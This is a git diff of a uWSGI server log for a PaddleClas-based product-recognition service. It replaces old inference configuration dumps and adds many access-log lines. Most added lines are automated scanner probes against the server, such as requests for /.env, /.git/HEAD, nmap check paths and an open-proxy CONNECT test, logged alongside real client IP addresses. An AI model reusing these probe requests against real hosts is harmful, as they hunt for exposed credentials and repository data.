PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -1954,75 +3794,144 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:02:32 INFO: DetPostProcess : -2021-11-03 04:02:32 INFO: DetPreProcess : -2021-11-03 04:02:32 INFO: transform_ops : -2021-11-03 04:02:32 INFO: DetResize : -2021-11-03 04:02:32 INFO: interp : 2 -2021-11-03 04:02:32 INFO: keep_ratio : False -2021-11-03 04:02:32 INFO: target_size : [640, 640] -2021-11-03 04:02:32 INFO: DetNormalizeImage : -2021-11-03 04:02:32 INFO: is_scale : True -2021-11-03 04:02:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:32 INFO: DetPermute : -2021-11-03 04:02:32 INFO: Global : -2021-11-03 04:02:32 INFO: batch_size : 1 -2021-11-03 04:02:32 INFO: cpu_num_threads : 10 -2021-11-03 04:02:32 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:02:32 INFO: enable_benchmark : True -2021-11-03 04:02:32 INFO: enable_mkldnn : True -2021-11-03 04:02:32 INFO: enable_profile : False -2021-11-03 04:02:32 INFO: gpu_mem : 8000 -2021-11-03 04:02:32 INFO: image_shape : [3, 640, 640] -2021-11-03 04:02:32 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:02:32 INFO: ir_optim : True -2021-11-03 04:02:32 INFO: labe_list : ['foreground'] -2021-11-03 04:02:32 INFO: max_det_results : 5 -2021-11-03 04:02:32 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:02:32 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:02:32 INFO: threshold : 0.2 -2021-11-03 04:02:32 INFO: use_fp16 : False -2021-11-03 04:02:32 INFO: use_gpu : False -2021-11-03 04:02:32 INFO: use_tensorrt : False -2021-11-03 04:02:32 INFO: IndexProcess : -2021-11-03 04:02:32 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:02:32 INFO: return_k : 5 -2021-11-03 04:02:32 INFO: score_thres : 0.5 -2021-11-03 04:02:32 INFO: RecPostProcess : None -2021-11-03 04:02:32 INFO: RecPreProcess : -2021-11-03 04:02:32 INFO: transform_ops : -2021-11-03 04:02:32 INFO: ResizeImage : -2021-11-03 04:02:32 INFO: size : 224 -2021-11-03 04:02:32 INFO: NormalizeImage : -2021-11-03 04:02:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:32 INFO: order : -2021-11-03 04:02:32 INFO: scale : 0.00392157 -2021-11-03 04:02:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:32 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2397.6428508758545 ms per batch image +2022-02-07 09:17:55 INFO: DetPostProcess : +2022-02-07 09:17:55 INFO: DetPreProcess : +2022-02-07 09:17:55 INFO: transform_ops : +2022-02-07 09:17:55 INFO: DetResize : +2022-02-07 09:17:55 INFO: interp : 2 +2022-02-07 09:17:55 INFO: keep_ratio : False +2022-02-07 09:17:55 INFO: target_size : [640, 640] +2022-02-07 09:17:55 INFO: DetNormalizeImage : +2022-02-07 09:17:55 INFO: is_scale : True +2022-02-07 09:17:55 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:55 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:55 INFO: DetPermute : +2022-02-07 09:17:55 INFO: Global : +2022-02-07 09:17:55 INFO: batch_size : 1 +2022-02-07 09:17:55 INFO: cpu_num_threads : 1 +2022-02-07 09:17:55 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-07 09:17:55 INFO: enable_benchmark : True +2022-02-07 09:17:55 INFO: enable_mkldnn : True +2022-02-07 09:17:55 INFO: enable_profile : False +2022-02-07 09:17:55 INFO: gpu_mem : 8000 +2022-02-07 09:17:55 INFO: image_shape : [3, 640, 640] +2022-02-07 09:17:55 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-07 09:17:55 INFO: ir_optim : True +2022-02-07 09:17:55 INFO: labe_list : ['foreground'] +2022-02-07 09:17:55 INFO: max_det_results : 5 +2022-02-07 09:17:55 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-07 09:17:55 INFO: rec_nms_thresold : 0.05 +2022-02-07 09:17:55 INFO: 
threshold : 0.2 +2022-02-07 09:17:55 INFO: use_fp16 : False +2022-02-07 09:17:55 INFO: use_gpu : False +2022-02-07 09:17:55 INFO: use_tensorrt : False +2022-02-07 09:17:55 INFO: IndexProcess : +2022-02-07 09:17:55 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-07 09:17:55 INFO: return_k : 5 +2022-02-07 09:17:55 INFO: score_thres : 0.5 +2022-02-07 09:17:55 INFO: RecPostProcess : None +2022-02-07 09:17:55 INFO: RecPreProcess : +2022-02-07 09:17:55 INFO: transform_ops : +2022-02-07 09:17:55 INFO: ResizeImage : +2022-02-07 09:17:55 INFO: size : 224 +2022-02-07 09:17:55 INFO: NormalizeImage : +2022-02-07 09:17:55 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:55 INFO: order : +2022-02-07 09:17:55 INFO: scale : 0.00392157 +2022-02-07 09:17:55 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:55 INFO: ToCHWImage : None +Inference: 373.920202255249 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32766|app: 0|req: 6/15] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:02:31 2021] POST /reference_client/ => generated 98 bytes in 6321 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) +[pid: 19148|app: 0|req: 639/749] 58.213.200.39 () {34 vars in 446 bytes} [Mon Feb 7 09:17:54 2022] POST /reference_client/ => generated 98 bytes in 2764 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 640/750] 64.62.197.92 () {28 vars in 306 bytes} [Mon Feb 7 09:33:31 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 65/751] 128.14.209.170 () {34 vars in 488 bytes} [Mon Feb 7 09:35:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 641/752] 47.101.52.174 () {34 vars in 431 bytes} [Mon Feb 7 10:36:13 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 642/753] 8.142.31.126 () {38 vars in 678 bytes} [Mon Feb 7 11:09:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 643/754] 8.142.31.126 () {30 vars in 355 bytes} [Mon Feb 7 11:09:09 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 644/755] 8.142.31.126 () {30 vars in 353 bytes} [Mon Feb 7 11:09:09 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 645/756] 167.71.1.54 () {36 vars in 479 bytes} [Mon Feb 7 11:20:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 646/757] 103.203.56.1 () {34 vars in 388 bytes} [Mon Feb 7 11:32:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 647/758] 130.211.54.158 () {42 vars in 564 bytes} [Mon Feb 7 13:06:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 648/759] 158.181.131.81 () {32 vars in 465 bytes} [Mon Feb 7 13:07:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 649/760] 212.154.7.246 () {36 vars in 523 bytes} [Mon Feb 7 13:20:50 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 650/761] 212.154.7.246 () {40 vars in 630 bytes} [Mon Feb 7 13:20:52 2022] POST / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 651/762] 154.159.246.176 () {32 vars in 472 bytes} [Mon Feb 7 13:23:56 2022] GET / => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 652/763] 103.47.217.141 () {32 vars in 464 bytes} [Mon Feb 7 14:11:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 653/764] 167.94.146.58 () {28 vars in 310 bytes} [Mon Feb 7 14:35:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 654/765] 167.94.146.58 () {34 vars in 442 bytes} [Mon Feb 7 14:35:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 655/766] 192.241.209.10 () {34 vars in 394 bytes} [Mon Feb 7 15:11:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 656/767] 8.142.16.239 () {24 vars in 259 bytes} [Mon Feb 7 15:11:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 657/768] 103.207.42.166 () {36 vars in 590 bytes} [Mon Feb 7 15:11:48 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 658/769] 8.142.16.239 () {34 vars in 636 bytes} [Mon Feb 7 15:11:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 659/770] 103.207.42.166 () {40 vars in 697 bytes} [Mon Feb 7 15:11:55 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 660/771] 8.142.43.130 () {24 vars in 259 bytes} [Mon Feb 7 15:35:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 661/772] 8.142.43.130 () {34 vars in 636 bytes} [Mon Feb 7 15:35:32 2022] GET / 
=> generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 662/773] 111.196.124.162 () {38 vars in 597 bytes} [Mon Feb 7 16:10:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 663/774] 111.196.124.162 () {38 vars in 619 bytes} [Mon Feb 7 16:10:52 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 664/775] 111.196.124.162 () {38 vars in 597 bytes} [Mon Feb 7 16:10:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 665/776] 111.196.124.162 () {38 vars in 619 bytes} [Mon Feb 7 16:10:52 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 666/777] 35.245.215.165 () {28 vars in 355 bytes} [Mon Feb 7 16:50:47 2022] GET /?q=%compost%&t=h_&ia=web => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 667/778] 172.105.87.91 () {22 vars in 234 bytes} [Mon Feb 7 17:17:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 668/779] 172.105.87.91 () {22 vars in 296 bytes} [Mon Feb 7 17:17:19 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 669/780] 172.105.87.91 () {22 vars in 238 bytes} [Mon Feb 7 17:17:20 2022] OPTIONS / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 670/781] 172.105.87.91 () {22 vars in 238 bytes} [Mon Feb 7 17:17:21 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 
0) +[pid: 19148|app: 0|req: 671/782] 172.105.87.91 () {40 vars in 484 bytes} [Mon Feb 7 17:17:21 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 672/783] 172.105.87.91 () {32 vars in 361 bytes} [Mon Feb 7 17:17:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 26/784] 172.105.87.91 () {32 vars in 369 bytes} [Mon Feb 7 17:17:25 2022] GET /6pNh => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 27/785] 172.105.87.91 () {32 vars in 397 bytes} [Mon Feb 7 17:17:25 2022] GET /Portal/Portal.mwsl => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 28/786] 172.105.87.91 () {32 vars in 389 bytes} [Mon Feb 7 17:17:25 2022] GET /Portal0000.htm => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 66/787] 172.105.87.91 () {24 vars in 252 bytes} [Mon Feb 7 17:17:25 2022] OPTIONS * => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 7/788] 172.105.87.91 () {32 vars in 409 bytes} [Mon Feb 7 17:17:25 2022] GET /nmaplowercheck1644254244 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 5/789] 172.105.87.91 () {32 vars in 383 bytes} [Mon Feb 7 17:17:25 2022] GET /index.jhtml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 6/790] 172.105.87.91 () {32 vars in 379 bytes} [Mon Feb 7 17:17:25 2022] GET /.git/HEAD => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 7/791] 172.105.87.91 () {32 vars in 403 bytes} [Mon Feb 7 17:17:26 2022] GET 
/docs/cplugError.html/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 2/792] 172.105.87.91 () {32 vars in 385 bytes} [Mon Feb 7 17:17:26 2022] GET /__Additional => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 5/793] 172.105.87.91 () {36 vars in 462 bytes} [Mon Feb 7 17:17:26 2022] POST /scripts/WPnBr.dll => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 6/794] 172.105.87.91 () {32 vars in 442 bytes} [Mon Feb 7 17:17:26 2022] GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 7/795] 172.105.87.91 () {32 vars in 403 bytes} [Mon Feb 7 17:17:26 2022] GET /pools/default/buckets => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 673/796] 172.105.87.91 () {32 vars in 371 bytes} [Mon Feb 7 17:17:26 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 674/797] 172.105.87.91 () {34 vars in 397 bytes} [Mon Feb 7 17:17:26 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 675/798] 172.105.87.91 () {32 vars in 377 bytes} [Mon Feb 7 17:17:26 2022] GET /menu.jsp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 676/799] 172.105.87.91 () {32 vars in 442 bytes} [Mon Feb 7 17:17:26 2022] GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 677/800] 172.105.87.91 () {32 vars in 379 bytes} [Mon Feb 7 17:17:26 2022] GET /start.cgi => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 678/801] 172.105.87.91 () {32 vars in 362 bytes} [Mon Feb 7 17:17:27 2022] HEAD / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 679/802] 172.105.87.91 () {32 vars in 377 bytes} [Mon Feb 7 17:17:27 2022] GET /base.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 680/803] 172.105.87.91 () {32 vars in 361 bytes} [Mon Feb 7 17:17:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 681/804] 172.105.87.91 () {32 vars in 383 bytes} [Mon Feb 7 17:17:28 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 682/805] 172.105.87.91 () {28 vars in 389 bytes} [Mon Feb 7 17:17:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 683/806] 183.136.225.56 () {34 vars in 535 bytes} [Mon Feb 7 18:13:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 684/807] 179.43.170.170 () {40 vars in 629 bytes} [Mon Feb 7 20:45:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 685/808] 106.75.64.59 () {30 vars in 327 bytes} [Mon Feb 7 21:28:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 686/809] 20.55.53.144 () {34 vars in 495 bytes} [Mon Feb 7 21:56:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 687/810] 209.17.96.82 () {30 vars in 409 bytes} [Mon Feb 7 23:10:40 
2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 688/811] 47.92.105.73 () {34 vars in 458 bytes} [Tue Feb 8 01:18:35 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 689/812] 179.43.170.170 () {40 vars in 629 bytes} [Tue Feb 8 02:16:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 690/813] 65.49.20.69 () {28 vars in 305 bytes} [Tue Feb 8 02:21:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 691/814] 23.250.19.242 () {34 vars in 536 bytes} [Tue Feb 8 02:58:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 692/815] 23.250.19.242 () {30 vars in 359 bytes} [Tue Feb 8 02:58:44 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 693/816] 23.250.19.242 () {30 vars in 361 bytes} [Tue Feb 8 02:58:45 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 694/817] 23.250.19.242 () {30 vars in 387 bytes} [Tue Feb 8 02:58:46 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 695/818] 23.250.19.242 () {36 vars in 514 bytes} [Tue Feb 8 02:58:47 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 696/819] 130.211.54.158 () {42 vars in 565 bytes} [Tue Feb 8 02:58:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
697/820] 52.159.87.123 () {36 vars in 500 bytes} [Tue Feb 8 02:59:37 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 698/821] 52.159.87.123 () {36 vars in 514 bytes} [Tue Feb 8 02:59:37 2022] GET /wp-content/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 699/822] 222.186.19.207 () {26 vars in 341 bytes} [Tue Feb 8 03:19:34 2022] CONNECT fuwu.sogou.com:443 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 67/823] 222.186.19.207 () {30 vars in 504 bytes} [Tue Feb 8 03:19:34 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 46842] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 700/824] 179.43.170.170 () {40 vars in 629 bytes} [Tue Feb 8 07:52:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 701/825] 45.95.169.102 () {40 vars in 567 bytes} [Tue Feb 8 07:57:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 702/826] 109.237.103.9 () {36 vars in 523 bytes} [Tue Feb 8 10:24:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 703/827] 91.236.239.224 () {36 vars in 493 bytes} [Tue Feb 8 11:39:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 704/828] 91.236.239.224 () {38 vars in 527 bytes} [Tue Feb 8 11:40:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19148|app: 0|req: 705/829] 185.180.143.7 () {34 vars in 487 bytes} [Tue Feb 8 11:54:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 706/830] 185.180.143.7 () {34 vars in 501 bytes} [Tue Feb 8 11:54:36 2022] GET /backend => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 707/831] 34.140.248.32 () {42 vars in 563 bytes} [Tue Feb 8 12:52:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 3/832] 5.8.10.202 () {34 vars in 500 bytes} [Tue Feb 8 12:54:37 2022] GET /aaa9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 708/833] 5.8.10.202 () {34 vars in 500 bytes} [Tue Feb 8 12:54:39 2022] GET /aab9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:02:59 INFO: +2022-02-08 13:57:19 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -2032,77 +3941,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:02:59 INFO: DetPostProcess : -2021-11-03 04:02:59 INFO: DetPreProcess : -2021-11-03 04:02:59 INFO: transform_ops : -2021-11-03 04:02:59 INFO: DetResize : -2021-11-03 04:02:59 INFO: interp : 2 -2021-11-03 04:02:59 INFO: keep_ratio : False -2021-11-03 04:02:59 INFO: target_size : [640, 640] -2021-11-03 04:02:59 INFO: DetNormalizeImage : -2021-11-03 04:02:59 INFO: is_scale : True -2021-11-03 04:02:59 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:59 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:59 INFO: DetPermute : -2021-11-03 04:02:59 INFO: Global : -2021-11-03 04:02:59 INFO: batch_size : 1 -2021-11-03 04:02:59 INFO: cpu_num_threads : 10 -2021-11-03 04:02:59 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:02:59 INFO: enable_benchmark : True -2021-11-03 04:02:59 INFO: enable_mkldnn : True -2021-11-03 04:02:59 INFO: enable_profile : False -2021-11-03 04:02:59 INFO: gpu_mem : 8000 -2021-11-03 04:02:59 INFO: image_shape : [3, 640, 640] -2021-11-03 04:02:59 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:02:59 INFO: ir_optim : True -2021-11-03 04:02:59 INFO: labe_list : ['foreground'] -2021-11-03 04:02:59 INFO: max_det_results : 5 -2021-11-03 04:02:59 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:02:59 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:02:59 INFO: threshold : 0.2 -2021-11-03 04:02:59 INFO: use_fp16 : False -2021-11-03 04:02:59 INFO: use_gpu : False -2021-11-03 04:02:59 INFO: use_tensorrt : False -2021-11-03 04:02:59 INFO: IndexProcess : -2021-11-03 04:02:59 INFO: index_dir : 
